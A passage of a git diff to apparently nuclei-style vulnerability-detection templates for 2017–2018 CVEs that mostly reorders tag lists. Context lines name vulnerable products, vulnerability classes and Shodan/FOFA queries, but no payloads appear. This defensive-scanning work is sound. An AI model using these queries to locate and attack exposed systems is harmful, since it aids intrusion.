b/http/cves/2017/CVE-2017-5982.yaml index 582ac0dd8a..eb86a88b64 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: kodi product: kodi - tags: cve2017,kodi,lfi,edb,cve + tags: cve2017,cve,kodi,lfi,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 164fb4fc21..90a7e52c34 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -26,7 +26,7 @@ info: vendor: phpcollab product: phpcollab shodan-query: http.title:"PhpCollab" - tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive + tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive http: - raw: diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 05f932de93..770acc1320 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: microsoft product: internet_information_server - tags: cve,cve2017,rce,windows,iis,kev,microsoft + tags: cve2017,cve,rce,windows,iis,kev,microsoft http: - method: OPTIONS diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 94ddb0d403..13be80d787 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: magmi_project product: magmi - tags: cve,cve2017,magmi,xss,magmi_project + tags: cve2017,cve,magmi,xss,magmi_project http: - method: GET diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index 32b4768733..380effb48a 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -30,7 +30,7 @@ info: product: ipm-721s_firmware shodan-query: html:"Amcrest" fofa-query: "Amcrest" - tags: packetstorm,seclists,cve,cve2017,amcrest,iot + tags: cve2017,cve,packetstorm,seclists,amcrest,iot http: - method: GET diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index df6368bd23..aa23b0b8cd 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -29,7 +29,7 @@ info: vendor: joomla product: joomla\! shodan-query: http.component:"Joomla" - tags: cve,cve2017,joomla,sqli + tags: cve2017,cve,joomla,sqli variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 7d0ad11159..e16de26671 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: progress product: telerik_reporting - tags: cve,cve2017,xss,telerik,progress + tags: cve2017,cve,xss,telerik,progress http: - method: GET diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 497bb7d292..5fbff88165 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -28,7 +28,7 @@ info: vendor: raygun product: raygun4wp framework: wordpress - tags: cve,cve2017,wordpress,xss,wp-plugin,raygun + tags: cve2017,cve,wordpress,xss,wp-plugin,raygun http: - method: GET diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 11c7eb248e..3b7ddc7e49 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: odoo product: odoo - tags: cve,cve2017,odoo,lfi + tags: cve2017,cve,odoo,lfi http: - method: GET diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 1e534b42da..55e59504db 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -31,7 +31,7 @@ info: product: struts shodan-query: title:"Struts2 Showcase" fofa-query: title="Struts2 Showcase" - tags: cve,cve2017,apache,rce,struts,kev + tags: cve2017,cve,apache,rce,struts,kev variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index cbbec7ac42..af1381ac5a 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dnnsoftware product: dotnetnuke - tags: packetstorm,cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware + tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware http: - raw: diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 9f4a7adbec..6ed93627a5 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: boa product: boa - tags: boa,lfr,lfi,cve,cve2017,edb + tags: cve,cve2017,boa,lfr,lfi,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index d3cc71b009..8eccec72e5 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -25,7 +25,7 @@ info: max-request: 6 vendor: phpunit_project product: phpunit - tags: cve,cve2017,php,phpunit,rce,kev,phpunit_project + tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project http: - raw: diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 83e657f4d0..bdae46a82c 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: cisco product: adaptive_security_appliance_software - tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev + tags: cve2018,cve,edb,cisco,lfi,traversal,asa,kev http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index c00a43fb41..97e06709f9 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: jolokia product: jolokia - tags: cve,cve2018,jolokia,xss + tags: cve2018,cve,jolokia,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 8b7ba62b87..9c0bdd0331 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: jolokia product: webarchive_agent - tags: cve,cve2018,jolokia,rce,jndi,proxy + tags: cve2018,cve,jolokia,rce,jndi,proxy http: - raw: diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index f2375e142c..450f876702 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: cobblerd product: cobbler - tags: cve,cve2018,cobbler,auth-bypass,cobblerd + tags: cve2018,cve,cobbler,auth-bypass,cobblerd http: - raw: diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index a33ea7639e..78662675f4 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: gitlist product: gitlist - tags: git,cve,cve2018,gitlist,vulhub,rce + tags: cve,cve2018,git,gitlist,vulhub,rce http: - raw: diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index b072657853..9536358671 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -26,7 +26,7 @@ info: max-request: 3 vendor: domainmod product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated + tags: cve2018,cve,domainmod,xss,authenticated http: - raw: diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index b86a645e7e..7979843f0d 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: jenkins product: jenkins - tags: packetstorm,kev,vulhub,cve,cve2018,rce,jenkins + tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins http: - method: GET diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index e7c5711f9f..de5a0a9ac3 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dolibarr product: dolibarr - tags: cve,cve2018,xss,dolibarr + tags: cve2018,cve,xss,dolibarr http: - method: GET diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index 73ab51ed55..1338e2f6e5 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -27,7 +27,7 @@ info: max-request: 4 vendor: ncomputing product: vspace_pro - tags: cve2018,ncomputing,lfi,packetstorm,cve + tags: cve,cve2018,ncomputing,lfi,packetstorm http: - method: GET diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index f3fa73c233..3405527fc5 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dlink product: dwr-116_firmware - tags: dlink,edb,seclists,cve,cve2018,lfi,router + tags: cve2018,cve,dlink,edb,seclists,lfi,router http: - method: GET diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index 1b179af403..0fc3ff3ccd 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: dlink product: dwr-116_firmware - tags: cve2018,rce,iot,dlink,router,edb,seclists,cve + tags: cve,cve2018,rce,iot,dlink,router,edb,seclists http: - method: GET diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 70d8dba8fd..eb1422c95f 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -28,7 +28,7 @@ info: vendor: ipconfigure product: orchid_core_vms shodan-query: http.title:"Orchid Core VMS" - tags: cve,cve2018,orchid,vms,lfi,edb,ipconfigure + tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure http: - method: GET diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 3c752fbbc9..de63478b34 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: splunk product: splunk - tags: edb,cve,cve2018,splunk + tags: cve,cve2018,edb,splunk http: - method: GET diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 08255b6ab6..7e444986fa 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -29,7 +29,7 @@ info: vendor: apache product: tomcat_jk_connector shodan-query: title:"Apache Tomcat" - tags: cve,cve2018,apache,tomcat,httpd,mod-jk + tags: cve2018,cve,apache,tomcat,httpd,mod-jk http: - method: GET diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index c2bff933dd..6fe542525f 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: apache product: struts - tags: packetstorm,cve,cve2018,apache,rce,struts,kev + tags: cve,cve2018,packetstorm,apache,rce,struts,kev http: - method: GET diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index eaaa87a95e..cfd2104aea 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -29,7 +29,7 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" - tags: packetstorm,tomcat,redirect,cve,cve2018,apache + tags: cve,cve2018,packetstorm,tomcat,redirect,apache http: - method: GET diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index f41b076bb3..fd5cdcf5e1 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: eaton product: intelligent_power_manager - tags: edb,cve,cve2018,lfi,eaton + tags: cve,cve2018,edb,lfi,eaton http: - method: GET diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 57c97ce58e..8c74a61c99 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -30,7 +30,7 @@ info: max-request: 1 vendor: dell product: emc_idrac7 - tags: cve,cve2018,dell,injection,rce + tags: cve2018,cve,dell,injection,rce http: - method: GET diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 07a2417384..01b9be0edd 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: oecms_project product: oecms - tags: cve,cve2018,xss,edb,oecms_project + tags: cve2018,cve,xss,edb,oecms_project http: - method: GET diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 961af41ca2..ca6b0166d2 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: seagate product: nas_os - tags: cve,cve2018,redirect,seagate,nasos + tags: cve2018,cve,redirect,seagate,nasos http: - method: GET diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index 966099b72f..743d3fde78 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: phpmyadmin product: phpmyadmin - tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi + tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi http: - method: GET diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 36d27fb37b..7aa0701a2a 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: apache product: tika - tags: packetstorm,edb,cve,cve2018,apache,tika,rce,intrusive + tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive http: - method: PUT diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index c2515f4352..c2cc6810c3 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -27,7 +27,7 @@ info: vendor: fortinet product: fortios shodan-query: http.html:"/remote/login" "xxxxxxxx" - tags: cve,cve2018,fortios,lfi,kev,fortinet + tags: cve2018,cve,fortios,lfi,kev,fortinet http: - method: GET diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 6e743b4d21..96d7331ee8 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: zeta-producer product: zeta_producer - tags: cve,cve2018,lfi,edb,packetstorm,zeta-producer + tags: cve2018,cve,lfi,edb,packetstorm,zeta-producer http: - method: GET diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index d5ae6c991f..e5b69b320f 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: velotismart_project product: velotismart_wifi_firmware - tags: edb,cve,cve2018,lfi,camera,iot,velotismart_project + tags: cve2018,cve,edb,lfi,camera,iot,velotismart_project http: - method: GET diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 5243a776fb..ba01155d01 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: goodoldweb product: orange_forum - tags: cve2018,redirect,orangeforum,oss,seclists,cve,goodoldweb + tags: cve2018,cve,redirect,orangeforum,oss,seclists,goodoldweb http: - method: GET diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index e04fd74fed..7fa33a55ea 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: tecrail product: responsive_filemanager - tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive,tecrail + tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail http: - method: POST diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index f6488ad9ff..bc4f09de38 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: loytec product: lgate-902_firmware - tags: cve2018,loytec,lfi,packetstorm,seclists,cve + tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index db0d4fb837..de94c89cc2 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -28,7 +28,7 @@ info: vendor: loytec product: lgate-902_firmware shodan-query: http.html:"LGATE-902" - tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate + tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index b1d4888710..7da56cb3f3 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: ericssonlg product: ipecs_nms - tags: cve,cve2018,ericsson,lfi,traversal,edb,ericssonlg + tags: cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg http: - method: GET diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 1ea847bab5..e4f684c66a 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dlink product: central_wifimanager - tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast + tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast http: - method: GET diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index 1ed9482828..9d5b3db59d 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: argussurveillance product: dvr - tags: packetstorm,edb,cve,cve2018,argussurveillance,lfi,dvr + tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr http: - method: GET diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index d366cafeaf..482950cf7e 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cybrotech product: cybrohttpserver - tags: lfi,packetstorm,cve,cve2018,cybrotech + tags: cve2018,cve,lfi,packetstorm,cybrotech http: - raw: diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index e18ef2c29e..6905b25796 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -29,7 +29,7 @@ info: vendor: codemenschen product: gift_vouchers framework: wordpress - tags: sqli,wordpress,unauth,wp,gift-voucher,cve2018,edb,wpscan,cve,wp-plugin,codemenschen + tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: - raw: diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index dcd6ba14cc..070cd72b8e 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: jpcert product: logontracer - tags: rce,oast,edb,cve,cve2018,logontracer,intrusive,jpcert + tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert http: - raw: diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index 53116c52c7..b25c3e51b2 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -26,7 +26,7 @@ info: vendor: wechat_brodcast_project product: wechat_brodcast framework: wordpress - tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi,wechat_brodcast_project + tags: cve,cve2018,edb,seclists,wordpress,wp-plugin,lfi,wechat_brodcast_project http: - method: GET diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index bac78bcc29..8848a728d7 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -28,7 +28,7 @@ info: vendor: localize_my_post_project product: localize_my_post framework: wordpress - tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018,localize_my_post_project + tags: cve2018,cve,wordpress,lfi,plugin,wp,edb,packetstorm,localize_my_post_project http: - method: GET diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 2ddc1df173..c83fea85b5 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: circontrol product: circarlife_scada - tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife,circontrol + tags: cve,cve2018,scada,plc,iot,disclosure,edb,circarlife,circontrol http: - method: GET diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index b845d9201d..6c658a8393 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: "circontrol" product: circarlife_scada - tags: iot,disclosure,edb,cve,cve2018,circarlife,scada,circontrol + tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol http: - method: GET diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 479e4f0f35..4654af16ab 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: rubedo_project product: rubedo - tags: cve,cve2018,rubedo,lfi,edb,rubedo_project + tags: cve2018,cve,rubedo,lfi,edb,rubedo_project http: - method: GET diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index dc302ff8a9..21d24047ce 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: monstra product: monstra - tags: cve,cve2018,crlf,mostra,mostracms,cms,monstra + tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 7cc7c7ea3b..94b814b5f8 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -30,7 +30,7 @@ info: vendor: western_digital product: my_cloud_wdbctl0020hwt_firmware shodan-query: http.favicon.hash:-1074357885 - tags: packetstorm,cve,cve2018,auth-bypass,rce,wdcloud,western_digital + tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital http: - raw: diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 98a34aba79..3460fa0bb3 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -27,7 +27,7 @@ info: vendor: dotcms product: dotcms shodan-query: http.title:"dotCMS" - tags: cve,cve2018,redirect,dotcms + tags: cve2018,cve,redirect,dotcms http: - method: GET diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 567fa239f7..99ab959924 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: comodo product: unified_threat_management_firewall - tags: cve2018,comodo,rce,edb,cve + tags: cve,cve2018,comodo,rce,edb http: - raw: diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 010c50e864..6193f51570 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -25,7 +25,7 @@ info: vendor: wpml product: wpml framework: wordpress - tags: cve,cve2018,wordpress,xss,plugin,wpml + tags: cve2018,cve,wordpress,xss,plugin,wpml http: - method: POST diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index c2c16ddf3f..4fd37bae83 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: control-webpanel product: webpanel - tags: cve,cve2018,centos,lfi,packetstorm,control-webpanel + tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 203743f286..9a324ed6d1 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: planonsoftware product: planon - tags: xss,cve,cve2018,planon,planonsoftware + tags: cve,cve2018,xss,planon,planonsoftware http: - method: GET diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 19b5646518..a567542a7e 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -28,7 +28,7 @@ info: vendor: dedecms product: dedecms shodan-query: http.html:"DedeCms" - tags: dedecms,xss,cve,cve2018 + tags: cve2018,cve,dedecms,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 278adf6bec..c8f6de11a0 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: microstrategy product: microstrategy_web - tags: cve2018,microstrategy,xss,edb,packetstorm,cve,intrusive + tags: cve2018,cve,microstrategy,xss,edb,packetstorm,intrusive http: - method: GET diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index a0dfdee854..8764238f55 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microstrategy product: microstrategy_web - tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi + tags: cve,cve2018,traversal,edb,packetstorm,microstrategy,lfi http: - method: GET diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 9ba7ae7486..426baae017 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -30,7 +30,7 @@ info: vendor: tibco product: jasperreports_library shodan-query: html:"jasperserver-pro" - tags: packetstorm,seclists,cve,cve2018,lfi,kev,jasperserver,jasperreport,tibco + tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco http: - method: GET diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index c58c977e81..3276185ffa 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: gogs product: gogs - tags: 